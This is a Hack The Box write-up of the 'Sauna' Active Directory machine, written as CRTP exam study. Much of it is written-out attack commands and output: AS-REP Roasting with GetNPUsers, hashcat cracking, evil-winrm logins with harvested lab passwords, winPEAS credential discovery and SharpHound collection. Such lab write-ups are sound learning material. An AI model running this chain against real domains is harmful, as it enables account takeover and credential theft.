As I continue preparing for the CRTP, I’ve begun incorporating external resources beyond the course material to strengthen my understanding of Active Directory (AD) enumeration. My goal is to become comfortable identifying and abusing AD features without relying solely on automated tooling.

Coming from hands-on experience in enterprise AD environments, this shift in perspective has been eye-opening. I’ve had to retrain myself to view Active Directory not as a blue teamer or administrator responsible for maintaining and securing it, but through the lens of a red teamer assessing it for weaknesses and attack paths.

To reinforce this mindset and deepen my technical understanding, I completed and documented a write-up of the Saunamachine on Hack The Box. This exercise is part of my broader effort to solidify core AD attack fundamentals and prepare confidently for the CRTP exam.

After launching Burp Suite and configuring Mozilla Firefox to proxy traffic through it, I navigated to the target IP address. The application loaded successfully, revealing a banking web application interface:

Using the Wappalyzer browser extension, I identified that the web server was running Microsoft IIS. Additionally, the response headers and fingerprinting results indicated Windows Server as the underlying operating system:

During manual content enumeration of the application, I identified an about.html page that publicly listed team members.

Exposed employee names are particularly useful in domain environments, as they provide a basis for constructing probable username formats (e.g., first initial + last name, first.last, etc.), which can later be tested against authentication services during credential-based attacks.

Now that we have an idea of potential users, the next step is to begin enumerating the target’s exposed services. To do this, I used nmap to scan the host and identify open ports and running services.

Understanding what services are accessible will help determine possible attack vectors and guide further enumeration efforts.

Next, I ran an nmap scan against the target IP address (10.129.1.88) to identify which services were currently exposed:

Starting Nmap 7.98 ( https://nmap.org ) at 2026-02-20 17:10 -0500
Nmap scan report for 10.129.1.88
Host is up (0.036s latency).
Not shown: 987 filtered tcp ports (no-response)
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
80/tcp   open  http          Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Egotistical Bank :: Home
| http-methods: 
|_  Potentially risky methods: TRACE
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2026-02-21 05:09:58Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL, Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL, Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2019|10 (97%)
OS CPE: cpe:/o:microsoft:windows_server_2019 cpe:/o:microsoft:windows_10
Aggressive OS guesses: Windows Server 2019 (97%), Microsoft Windows 10 1903 - 21H1 (91%)
No exact OS matches for host (test conditions non-ideal).
Service Info: Host: SAUNA; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2026-02-21T05:10:06
|_  start_date: N/A
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled and required
|_clock-skew: 6h59m16sOS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 70.61 seconds

From the nmap scan, a few services immediately stood out — most notably LDAP, along with the domain name set to EGOTISTICAL-BANK.LOCAL.

Earlier, Wappalyzer confirmed that IIS was running, which already suggested a Windows environment. Now, seeing LDAP and a domain name further reinforces that this host is very likely operating within an Active Directory domain — and potentially as a Domain Controller.

To begin enumerating LDAP, I decided to use Windapsearch, a lightweight Python script that allows for querying LDAP from the command line.

The tool can be found here:
https://github.com/ropnop/windapsearch

According to the documentation:

• You must specify a Domain Controller using --dc-ip, or provide a domain with -d.
• A valid domain username and password are required for most queries.
• If no credentials are provided, the script will attempt an anonymous bind and enumerate the default namingContext, but most additional queries will fail.
• The username must include the full domain (e.g., [email protected] or DOMAIN\user).

Since we do not yet have valid credentials, the first step will be to test whether anonymous bind is allowed and determine how much information we can extract from LDAP without authentication.

jbrown@Jabaris-MacBook-Pro windapsearch % python3 windapsearch.py -d EGOTISTICAL-BANK.LOCAL --dc-ip 10.129.1.88 
[+] No username provided. Will try anonymous bind.
[+] Using Domain Controller at: 10.129.1.88
[+] Getting defaultNamingContext from Root DSE
[+] Found: DC=EGOTISTICAL-BANK,DC=LOCAL
[+] Attempting bind
[+] ...success! Binded as: 
[+]  None
[*] Bye!
jbrown@Jabaris-MacBook-Pro windapsearch %

Since I didn’t provide a username or password, the LDAP query failed. Anonymous bind is not allowed on this domain, which means we’ll need valid credentials to enumerate further.

At this point, guessing usernames manually would be inefficient. However, we previously identified a list of team members from the about.html page, which gives us a strong starting point.

To generate possible username formats, I decided to use Username Anarchy, a tool that automatically creates common username permutations from a list of names:

https://github.com/urbanadventurer/username-anarchy

Before running the tool, I first created a text file containing the first and last names of the team members.

Fergus Smith
Hugo Bear
Steven Kerb
Shaun Coins
Bowie Taylor
Sophie Driver

using Username Anarchy:

jbrown@Jabaris-MacBook-Pro username-anarchy % ./username-anarchy --input-file ../../sauna/names.txt --select-format first,flast,first.last,firstl > ../../sauna/usernamelist.txt
jbrown@Jabaris-MacBook-Pro username-anarchy % cat ../../sauna/usernamelist.txt 
fergus
fergus.smith
ferguss
fsmith
hugo
hugo.bear
hugob
hbear
steven
steven.kerb
stevenk
skerb
shaun
shaun.coins
shaunc
scoins
bowie
bowie.taylor
bowiet
btaylor
sophie
sophie.driver
sophied
sdriver

Now that we have generated a list of potential usernames, we’ve met the conditions to attempt an AS-REP Roastingattack and try to extract a hash from any user account that has preauthentication disabled.

Since we do not yet have valid credentials, AS-REP Roasting is a logical next step. If any account does not require Kerberos preauthentication, we can request a TGT for that user and retrieve a crackable hash without needing a password.

To automate this process, I used a while loop to iterate through the list of generated usernames and check each one against the domain.

jbrown@Jabaris-MacBook-Pro examples % while read p; do python3 GetNPUsers.py EGOTISTICAL-BANK.LOCAL/"$p" -request -no-pass -dc-ip 10.129.1.88  >> ../../../sauna/hash.txt; done < ../../../sauna/usernamelist.txt
jbrown@Jabaris-MacBook-Pro examples % cat ../../../sauna/hash.txt 
Impacket v0.13.0 - Copyright Fortra, LLC and its affiliated companies 
[*] Getting TGT for fergus
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
Impacket v0.13.0 - Copyright Fortra, LLC and its affiliated companies 
[*] Getting TGT for fergus.smith
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
Impacket v0.13.0 - Copyright Fortra, LLC and its affiliated companies 
[*] Getting TGT for ferguss
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
Impacket v0.13.0 - Copyright Fortra, LLC and its affiliated companies 
[*] Getting TGT for fsmith
[email protected]:b7f1d6466030efd522417d8a57486c72$81966e323a03529b80b6a903aa45f33fb09a4eedc7bb51ad189cf5132f021be35fe3bb114ba77ae54488ee18421926719a4d4b64f057a9119a75d22a5543d75b41fec6e9dca64cff751a04641a022d5e98612b0e27ebe8ac4ceef01b2aeecc677bae2c31993d3f5865462f6f55c9bedf4b98d2b57aefb8bbb6a88ca07695c8f94d1c768681c72d9ddaddbad79d434c46be11bd4aff206cd91e9179756760e3db6cafa9cdde5a9afb42d7a9366a3d7d47f9fb4a42a550bd44c7369c360a92ae46dba7a4ea343aa499356a399c09771568a2f71be573452cf66ea66372b75a9a41ed2ca2b55f1f410ee7fce71e2dd8c98f8dcc10b2fa2a8041837a80e6f2e8765d
Impacket v0.13.0 - Copyright Fortra, LLC and its affiliated companies 

I was able to get a password hash for the user fsmith!

[*] Getting TGT for fsmith
[email protected]:b7f1d6466030efd522417d8a57486c72$81966e323a03529b80b6a903aa45f33fb09a4eedc7bb51ad189cf5132f021be35fe3bb114ba77ae54488ee18421926719a4d4b64f057a9119a75d22a5543d75b41fec6e9dca64cff751a04641a022d5e98612b0e27ebe8ac4ceef01b2aeecc677bae2c31993d3f5865462f6f55c9bedf4b98d2b57aefb8bbb6a88ca07695c8f94d1c768681c72d9ddaddbad79d434c46be11bd4aff206cd91e9179756760e3db6cafa9cdde5a9afb42d7a9366a3d7d47f9fb4a42a550bd44c7369c360a92ae46dba7a4ea343aa499356a399c09771568a2f71be573452cf66ea66372b75a9a41ed2ca2b55f1f410ee7fce71e2dd8c98f8dcc10b2fa2a8041837a80e6f2e8765d
Impacket v0.13.0 - Copyright Fortra, LLC and its affiliated companies

Now that we’ve successfully obtained an AS-REP hash, the next step is to attempt an offline brute-force attack to recover the user’s password.

Since AS-REP Roasting provides us with a crackable Kerberos hash, we can use hashcat to perform an offline password attack without interacting with the domain controller further. This is advantageous because it avoids additional authentication attempts that could trigger account lockouts or monitoring alerts.

For Kerberos 5 AS-REP hashes, the correct Hashcat mode is 18200

jbrown@Jabaris-MacBook-Pro hashcat % ./hashcat -m 18200 ../../sauna/hash.txt ../../wordlist/rockyou.txt --force

Watchdog: Temperature abort trigger set to 100c
Host memory allocated for this attack: 599 MB (1056 MB free)
Dictionary cache built:
* Filename..: ../../wordlist/rockyou.txt
* Passwords.: 14344391
* Bytes.....: 139921497
* Keyspace..: 14344384
* Speed.....: 530 MiB/s
* Runtime...: 0.26s
[email protected]:b7f1d6466030efd522417d8a57486c72$81966e323a03529b80b6a903aa45f33fb09a4eedc7bb51ad189cf5132f021be35fe3bb114ba77ae54488ee18421926719a4d4b64f057a9119a75d22a5543d75b41fec6e9dca64cff751a04641a022d5e98612b0e27ebe8ac4ceef01b2aeecc677bae2c31993d3f5865462f6f55c9bedf4b98d2b57aefb8bbb6a88ca07695c8f94d1c768681c72d9ddaddbad79d434c46be11bd4aff206cd91e9179756760e3db6cafa9cdde5a9afb42d7a9366a3d7d47f9fb4a42a550bd44c7369c360a92ae46dba7a4ea343aa499356a399c09771568a2f71be573452cf66ea66372b75a9a41ed2ca2b55f1f410ee7fce71e2dd8c98f8dcc10b2fa2a8041837a80e6f2e8765d:Thestrokes23

found the password!

Thestrokes23

Looking back at the nmap scan results, we can see that the WinRM service is running on port 5985.

This is important because WinRM (Windows Remote Management) allows for remote command execution over HTTP.

5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)

Since WinRM is exposed on port 5985, we can use it to attempt authentication with the credentials we harvested from the AS-REP hash.

If the credentials are valid and the user has remote access privileges, this should grant us an interactive shell on the target system. From there, we can begin post-exploitation enumeration and attempt to retrieve the user flag.

To test this, we can use a tool such as evil-winrm to authenticate against the target using the cracked domain credentials:

jbrown@Jabaris-MacBook-Pro evil-winrm % ./evil-winrm.rb -i 10.129.1.88 -u fsmith -p 'Thestrokes23'
/opt/homebrew/lib/ruby/gems/4.0.0/gems/winrm-2.3.9/lib/winrm/psrp/fragment.rb:35: warning: redefining 'object_id' may cause serious problems
/opt/homebrew/lib/ruby/gems/4.0.0/gems/winrm-2.3.9/lib/winrm/psrp/message_fragmenter.rb:29: warning: redefining 'object_id' may cause serious problems
                                        Evil-WinRM shell v3.9
                                        Warning: Remote path completions is disabled due to ruby limitation: undefined method 'quoting_detection_proc' for module Reline
                                        Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        Info: Establishing connection to remote endpoint
/opt/homebrew/Cellar/ruby/4.0.1/lib/ruby/gems/4.0.0/gems/rexml-3.4.4/lib/rexml/xpath.rb:67: warning: REXML::XPath.each, REXML::XPath.first, REXML::XPath.match dropped support for nodeset...
*Evil-WinRM* PS C:\Users\FSmith\Documents>

/opt/homebrew/Cellar/ruby/4.0.1/lib/ruby/gems/4.0.0/gems/rexml-3.4.4/lib/rexml/xpath.rb:67: warning: REXML::XPath.each, REXML::XPath.first, REXML::XPath.match dropped support for nodeset...
*Evil-WinRM* PS C:\Users\FSmith\Documents> dir
*Evil-WinRM* PS C:\Users\FSmith\Documents> cd ..
*Evil-WinRM* PS C:\Users\FSmith> dir
    Directory: C:\Users\FSmith
Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-r---        1/23/2020  10:01 AM                Desktop
d-r---        1/24/2020  10:40 AM                Documents
d-r---        9/15/2018  12:19 AM                Downloads
d-r---        9/15/2018  12:19 AM                Favorites
d-r---        9/15/2018  12:19 AM                Links
d-r---        9/15/2018  12:19 AM                Music
d-r---        9/15/2018  12:19 AM                Pictures
d-----        9/15/2018  12:19 AM                Saved Games
d-r---        9/15/2018  12:19 AM                Videos
*Evil-WinRM* PS C:\Users\FSmith> cd Desktop
*Evil-WinRM* PS C:\Users\FSmith\Desktop> dir
    Directory: C:\Users\FSmith\Desktop
Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-ar---        2/22/2026   7:05 PM             34 user.txt
*Evil-WinRM* PS C:\Users\FSmith\Desktop> type user.txt
*****FLAGFOUNDHERE*******
*Evil-WinRM* PS C:\Users\FSmith\Desktop>

Awesome — after successfully authenticating over WinRM, I was able to retrieve the user flag.

Now it’s time to focus on obtaining the admin flag.

Since we’re officially in the post-exploitation phase, the goal shifts to identifying any vulnerable services, misconfigurations, weak permissions, or privileged accounts that could allow us to escalate our privileges.

To assist with local enumeration, I decided to upload winPEAS, a well-known Windows privilege escalation tool from the PEASS-ng suite:

https://github.com/peass-ng/PEASS-ng

winPEAS automates the process of checking for common privilege escalation vectors such as:

• Misconfigured services
• Weak file or folder permissions
• Stored credentials
• Registry misconfigurations
• Token privileges
• Scheduled tasks
• And other common Windows escalation paths

By running winPEAS, we can quickly identify potential misconfigurations that may allow us to move from a low-privileged user to SYSTEM or Administrator.

Info: Uploading /Users/jbrown/HTB/tools/PEASS-ng/winPEAS/winPEASps1/winPEAS.ps1 to C:\Users\FSmith\Desktop\winPEAS.ps1
/opt/homebrew/Cellar/ruby/4.0.1/lib/ruby/gems/4.0.0/gems/rexml-3.4.4/lib/rexml/xpath.rb:67: warning: REXML::XPath.each, REXML::XPath.first, REXML::XPath.match dropped support for nodeset...
                                        Data: 125744 bytes of 125744 bytes copied
                                        Info: Upload successful!
*Evil-WinRM* PS C:\Users\FSmith\Desktop> ls
    Directory: C:\Users\FSmith\Desktop
Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-ar---        2/22/2026   7:05 PM             34 user.txt
-a----        2/22/2026   8:02 PM          94310 winPEAS.ps1
*Evil-WinRM* PS C:\Users\FSmith\Desktop> 

While reviewing the output from winPEAS, a few interesting findings stood out. Most notably, I was able to identify additional logon credentials associated with this machine.

Discovering stored or cached credentials during post-exploitation is significant, as they may belong to a more privileged account or be reused elsewhere in the environment. At this stage, any credential material is worth investigating further.

=========|| Additonal Winlogon Credentials Check
EGOTISTICALBANK
EGOTISTICALBANK\svc_loanmanager
Moneymakestheworldgoround!

Unfortunately, winPEAS did not reveal any unquoted service path vulnerabilities that would allow us to escalate privileges through the well-known Windows path parsing issue.

Unquoted service path vulnerabilities occur when a service executable path contains spaces and is not enclosed in quotes. Because of how Windows parses file paths, it may attempt to execute a malicious binary placed in a higher-level directory (e.g., C:\Program.exe) before reaching the intended service binary.

=========|| SERVICE path vulnerable check
Checking for vulnerable service .exe
Access denied 
At C:\Users\FSmith\Desktop\winPEAS.ps1:1314 char:1
+ Get-WmiObject Win32_Service | Where-Object { $_.PathName -like '*.exe ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : InvalidOperation: (:) [Get-WmiObject], ManagementException
    + FullyQualifiedErrorId : GetWMIManagementException,Microsoft.PowerShell.Commands.GetWmiObjectCommand
=========|| Checking for Unquoted Service Paths
Fetching the list of services, this may take a while...
Access denied 
At C:\Users\FSmith\Desktop\winPEAS.ps1:119 char:15
+   $services = Get-WmiObject -Class Win32_Service |
+               ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : InvalidOperation: (:) [Get-WmiObject], ManagementException
    + FullyQualifiedErrorId : GetWMIManagementException,Microsoft.PowerShell.Commands.GetWmiObjectCommand
No unquoted service paths were found

Going through the large winPEAS output, one finding stood out. To validate whether this account actually exists on the system and isn’t just a reference, I decided to check the C:\Users\ directory.

If the account has a profile directory present, it confirms that the user has logged onto the machine at some point. This can help us determine whether the credentials we found belong to a legitimate local or domain account and whether they might be useful for privilege escalation or lateral movement:

/opt/homebrew/Cellar/ruby/4.0.1/lib/ruby/gems/4.0.0/gems/rexml-3.4.4/lib/rexml/xpath.rb:67: warning: REXML::XPath.each, REXML::XPath.first, REXML::XPath.match dropped support for nodeset...
*Evil-WinRM* PS C:\Users\FSmith\Documents> dir C:\Users
    Directory: C:\Users
Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----        1/25/2020   1:05 PM                Administrator
d-----        1/23/2020   9:52 AM                FSmith
d-r---        1/22/2020   9:32 PM                Public
d-----        1/24/2020   4:05 PM                svc_loanmgr
*Evil-WinRM* PS C:\Users\FSmith\Documents>

Now that we’ve confirmed the account exists on the system, we can attempt to authenticate as svc_loanmgr using the credentials we discovered:

jbrown@Jabaris-MacBook-Pro evil-winrm % ./evil-winrm.rb -i 10.129.4.62 -u svc_loanmgr -p 'Moneymakestheworldgoround!'
/opt/homebrew/lib/ruby/gems/4.0.0/gems/winrm-2.3.9/lib/winrm/psrp/fragment.rb:35: warning: redefining 'object_id' may cause serious problems
/opt/homebrew/lib/ruby/gems/4.0.0/gems/winrm-2.3.9/lib/winrm/psrp/message_fragmenter.rb:29: warning: redefining 'object_id' may cause serious problems
                                        Evil-WinRM shell v3.9
                                        Warning: Remote path completions is disabled due to ruby limitation: undefined method 'quoting_detection_proc' for module Reline
                                        Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        Info: Establishing connection to remote endpoint
/opt/homebrew/Cellar/ruby/4.0.1/lib/ruby/gems/4.0.0/gems/rexml-3.4.4/lib/rexml/xpath.rb:67: warning: REXML::XPath.each, REXML::XPath.first, REXML::XPath.match dropped support for nodeset...
*Evil-WinRM* PS C:\Users\svc_loanmgr\Documents>

Now that we have access to a more privileged account, let’s use BloodHound to get a visual mapping of the banking domain. This allows us to clearly see relationships between users, groups, computers, and permissions, and helps identify potential privilege escalation paths that may not be obvious from manual enumeration alone.

By collecting domain data and importing it into BloodHound, we can analyze:

• Group memberships
• Delegated permissions
• Overly permissive ACLs
• Attack paths to high-value targets such as Domain Admins

This visualization makes it much easier to spot misconfigurations or privilege chains that we can exploit.

*Evil-WinRM* PS C:\Users\svc_loanmgr\Desktop> Expand-Archive -Path sharphound-v2.9.0.zip
*Evil-WinRM* PS C:\Users\svc_loanmgr\Desktop> dir
    Directory: C:\Users\svc_loanmgr\Desktop
Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----        2/23/2026   1:09 AM                sharphound-v2.9.0
-a----        2/23/2026   1:08 AM        2465361 sharphound-v2.9.0.zip
-a----        2/23/2026   1:05 AM        1618189 SharpHound.ps1
*Evil-WinRM* PS C:\Users\svc_loanmgr\Desktop> cd sharphound-v2.9.0
*Evil-WinRM* PS C:\Users\svc_loanmgr\Desktop\sharphound-v2.9.0> dir
    Directory: C:\Users\svc_loanmgr\Desktop\sharphound-v2.9.0
Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        1/16/2026   6:40 PM        1318912 SharpHound.exe
-a----        1/16/2026   6:40 PM            553 SharpHound.exe.config
-a----        1/16/2026   6:40 PM         235008 SharpHound.pdb
-a----        1/16/2026   6:40 PM        1618189 SharpHound.ps1
*Evil-WinRM* PS C:\Users\svc_loanmgr\Desktop\sharphound-v2.9.0> ./SharpHound.exe

Run the collector:

*Evil-WinRM* PS C:\Users\svc_loanmgr\Desktop\sharphound-v2.9.0> ./SharpHound.exe
2026-02-23T01:10:01.9369849-08:00|INFORMATION|This version of SharpHound is compatible with the 5.0.0 Release of BloodHound
2026-02-23T01:10:01.9838795-08:00|INFORMATION|SharpHound Version: 2.9.0.0
2026-02-23T01:10:01.9838795-08:00|INFORMATION|SharpHound Common Version: 4.5.2.0
2026-02-23T01:10:02.1713577-08:00|INFORMATION|Resolved Collection Methods: Group, LocalAdmin, Session, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote, CertServices, LdapServices, WebClientService, SmbInfo
2026-02-23T01:10:02.2651250-08:00|INFORMATION|Initializing SharpHound at 1:10 AM on 2/23/2026
2026-02-23T01:10:02.4213649-08:00|INFORMATION|Resolved current domain to EGOTISTICAL-BANK.LOCAL
2026-02-23T01:10:02.7338588-08:00|INFORMATION|Flags: Group, LocalAdmin, Session, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote, CertServices, LdapServices, WebClientService, SmbInfo
2026-02-23T01:10:02.8901287-08:00|INFORMATION|Beginning LDAP search for EGOTISTICAL-BANK.LOCAL
2026-02-23T01:10:02.9057441-08:00|INFORMATION|Collecting AdminSDHolder data for EGOTISTICAL-BANK.LOCAL
2026-02-23T01:10:03.0307390-08:00|INFORMATION|AdminSDHolder ACL hash 00282C4ECB176A3D401881255CEFB538664FC932 calculated for EGOTISTICAL-BANK.LOCAL.
2026-02-23T01:10:03.2026022-08:00|INFORMATION|[CommonLib ACLProc]Building GUID Cache for EGOTISTICAL-BANK.LOCAL
2026-02-23T01:10:03.2026022-08:00|INFORMATION|[CommonLib ACLProc]Building GUID Cache for EGOTISTICAL-BANK.LOCAL
2026-02-23T01:10:03.2182254-08:00|INFORMATION|[CommonLib ACLProc]Building GUID Cache for EGOTISTICAL-BANK.LOCAL
2026-02-23T01:10:03.2182254-08:00|INFORMATION|[CommonLib ACLProc]Building GUID Cache for EGOTISTICAL-BANK.LOCAL
2026-02-23T01:10:03.2338526-08:00|INFORMATION|[CommonLib ACLProc]Building GUID Cache for EGOTISTICAL-BANK.LOCAL
2026-02-23T01:10:03.2338526-08:00|INFORMATION|[CommonLib ACLProc]Building GUID Cache for EGOTISTICAL-BANK.LOCAL
2026-02-23T01:10:03.2338526-08:00|INFORMATION|[CommonLib ACLProc]Building GUID Cache for EGOTISTICAL-BANK.LOCAL
2026-02-23T01:10:03.2338526-08:00|INFORMATION|[CommonLib ACLProc]Building GUID Cache for EGOTISTICAL-BANK.LOCAL
2026-02-23T01:10:03.6244790-08:00|INFORMATION|[CommonLib ACLProc]Building GUID Cache for EGOTISTICAL-BANK.LOCAL
2026-02-23T01:10:03.6244790-08:00|INFORMATION|[CommonLib ACLProc]Building GUID Cache for EGOTISTICAL-BANK.LOCAL
2026-02-23T01:10:03.6713598-08:00|INFORMATION|[CommonLib ACLProc]Building GUID Cache for EGOTISTICAL-BANK.LOCAL
2026-02-23T01:10:03.7338558-08:00|INFORMATION|[CommonLib ACLProc]Building GUID Cache for EGOTISTICAL-BANK.LOCAL
2026-02-23T01:10:03.7338558-08:00|INFORMATION|[CommonLib ACLProc]Building GUID Cache for EGOTISTICAL-BANK.LOCAL
2026-02-23T01:10:03.7338558-08:00|INFORMATION|[CommonLib ACLProc]Building GUID Cache for EGOTISTICAL-BANK.LOCAL
2026-02-23T01:10:03.7338558-08:00|INFORMATION|[CommonLib ACLProc]Building GUID Cache for EGOTISTICAL-BANK.LOCAL
2026-02-23T01:10:03.7494806-08:00|INFORMATION|[CommonLib ACLProc]Building GUID Cache for EGOTISTICAL-BANK.LOCAL
2026-02-23T01:10:03.7494806-08:00|INFORMATION|[CommonLib ACLProc]Building GUID Cache for EGOTISTICAL-BANK.LOCAL
2026-02-23T01:10:03.7651047-08:00|INFORMATION|[CommonLib ACLProc]Building GUID Cache for EGOTISTICAL-BANK.LOCAL
2026-02-23T01:10:03.7651047-08:00|INFORMATION|[CommonLib ACLProc]Building GUID Cache for EGOTISTICAL-BANK.LOCAL
2026-02-23T01:10:03.7807406-08:00|INFORMATION|[CommonLib ACLProc]Building GUID Cache for EGOTISTICAL-BANK.LOCAL
2026-02-23T01:10:03.7807406-08:00|INFORMATION|[CommonLib ACLProc]Building GUID Cache for EGOTISTICAL-BANK.LOCAL
2026-02-23T01:10:03.7807406-08:00|INFORMATION|[CommonLib ACLProc]Building GUID Cache for EGOTISTICAL-BANK.LOCAL
2026-02-23T01:10:03.7807406-08:00|INFORMATION|[CommonLib ACLProc]Building GUID Cache for EGOTISTICAL-BANK.LOCAL
2026-02-23T01:10:03.7963581-08:00|INFORMATION|[CommonLib ACLProc]Building GUID Cache for EGOTISTICAL-BANK.LOCAL
2026-02-23T01:10:03.7963581-08:00|INFORMATION|[CommonLib ACLProc]Building GUID Cache for EGOTISTICAL-BANK.LOCAL
2026-02-23T01:10:03.8119850-08:00|INFORMATION|[CommonLib ACLProc]Building GUID Cache for EGOTISTICAL-BANK.LOCAL
2026-02-23T01:10:03.8119850-08:00|INFORMATION|[CommonLib ACLProc]Building GUID Cache for EGOTISTICAL-BANK.LOCAL
2026-02-23T01:10:03.8276186-08:00|INFORMATION|[CommonLib ACLProc]Building GUID Cache for EGOTISTICAL-BANK.LOCAL
2026-02-23T01:10:03.8276186-08:00|INFORMATION|[CommonLib ACLProc]Building GUID Cache for EGOTISTICAL-BANK.LOCAL
2026-02-23T01:10:03.8276186-08:00|INFORMATION|[CommonLib ACLProc]Building GUID Cache for EGOTISTICAL-BANK.LOCAL
2026-02-23T01:10:03.8432316-08:00|INFORMATION|[CommonLib ACLProc]Building GUID Cache for EGOTISTICAL-BANK.LOCAL
2026-02-23T01:10:03.8432316-08:00|INFORMATION|[CommonLib ACLProc]Building GUID Cache for EGOTISTICAL-BANK.LOCAL
2026-02-23T01:10:03.8744850-08:00|INFORMATION|Beginning LDAP search for EGOTISTICAL-BANK.LOCAL Configuration NC
2026-02-23T01:10:04.1557346-08:00|INFORMATION|[CommonLib ACLProc]Building GUID Cache for EGOTISTICAL-BANK.LOCAL
2026-02-23T01:10:04.1869905-08:00|INFORMATION|[CommonLib ACLProc]Building GUID Cache for EGOTISTICAL-BANK.LOCAL
2026-02-23T01:10:04.2026128-08:00|INFORMATION|[CommonLib ACLProc]Building GUID Cache for EGOTISTICAL-BANK.LOCAL
2026-02-23T01:10:04.2026128-08:00|INFORMATION|[CommonLib ACLProc]Building GUID Cache for EGOTISTICAL-BANK.LOCAL
2026-02-23T01:10:04.2182346-08:00|INFORMATION|[CommonLib ACLProc]Building GUID Cache for EGOTISTICAL-BANK.LOCAL
2026-02-23T01:10:04.2494849-08:00|INFORMATION|[CommonLib ACLProc]Building GUID Cache for EGOTISTICAL-BANK.LOCAL
2026-02-23T01:10:04.2651052-08:00|INFORMATION|[CommonLib ACLProc]Building GUID Cache for EGOTISTICAL-BANK.LOCAL
2026-02-23T01:10:04.2651052-08:00|INFORMATION|[CommonLib ACLProc]Building GUID Cache for EGOTISTICAL-BANK.LOCAL
2026-02-23T01:10:04.2651052-08:00|INFORMATION|[CommonLib ACLProc]Building GUID Cache for EGOTISTICAL-BANK.LOCAL
2026-02-23T01:10:04.2651052-08:00|INFORMATION|[CommonLib ACLProc]Building GUID Cache for EGOTISTICAL-BANK.LOCAL
2026-02-23T01:10:04.2807311-08:00|INFORMATION|[CommonLib ACLProc]Building GUID Cache for EGOTISTICAL-BANK.LOCAL
2026-02-23T01:10:04.2807311-08:00|INFORMATION|[CommonLib ACLProc]Building GUID Cache for EGOTISTICAL-BANK.LOCAL
2026-02-23T01:10:04.2807311-08:00|INFORMATION|[CommonLib ACLProc]Building GUID Cache for EGOTISTICAL-BANK.LOCAL
2026-02-23T01:10:04.2807311-08:00|INFORMATION|[CommonLib ACLProc]Building GUID Cache for EGOTISTICAL-BANK.LOCAL
2026-02-23T01:10:04.2807311-08:00|INFORMATION|[CommonLib ACLProc]Building GUID Cache for EGOTISTICAL-BANK.LOCAL
2026-02-23T01:10:04.2963581-08:00|INFORMATION|[CommonLib ACLProc]Building GUID Cache for EGOTISTICAL-BANK.LOCAL
2026-02-23T01:10:04.2963581-08:00|INFORMATION|[CommonLib ACLProc]Building GUID Cache for EGOTISTICAL-BANK.LOCAL
2026-02-23T01:10:04.2963581-08:00|INFORMATION|[CommonLib ACLProc]Building GUID Cache for EGOTISTICAL-BANK.LOCAL
2026-02-23T01:10:05.6401074-08:00|INFORMATION|Producer has finished, closing LDAP channel
2026-02-23T01:10:05.6401074-08:00|INFORMATION|LDAP channel closed, waiting for consumers
2026-02-23T01:10:06.1245461-08:00|INFORMATION|Consumers finished, closing output channel
Closing writers
2026-02-23T01:10:06.1557387-08:00|INFORMATION|Output channel closed, waiting for output task to complete
2026-02-23T01:10:06.3120870-08:00|INFORMATION|Status: 297 objects finished (+297 99)/s -- Using 58 MB RAM
2026-02-23T01:10:06.3276178-08:00|INFORMATION|Enumeration finished in 00:00:03.4496146
2026-02-23T01:10:06.4526159-08:00|INFORMATION|Saving cache with stats: 16 ID to type mappings.
 0 name to SID mappings.
 1 machine sid mappings.
 2 sid to domain mappings.
 0 global catalog mappings.
2026-02-23T01:10:06.4994897-08:00|INFORMATION|SharpHound Enumeration Completed at 1:10 AM on 2/23/2026! Happy Graphing!

downloand the Zip File:

*Evil-WinRM* PS C:\Users\svc_loanmgr\Desktop\sharphound-v2.9.0> download 20260223011005_BloodHound.zip
                                        Info: Downloading C:\Users\svc_loanmgr\Desktop\sharphound-v2.9.0\20260223011005_BloodHound.zip to 20260223011005_BloodHound.zip
/opt/homebrew/Cellar/ruby/4.0.1/lib/ruby/gems/4.0.0/gems/rexml-3.4.4/lib/rexml/xpath.rb:67: warning: REXML::XPath.each, REXML::XPath.first, REXML::XPath.match dropped support for nodeset...
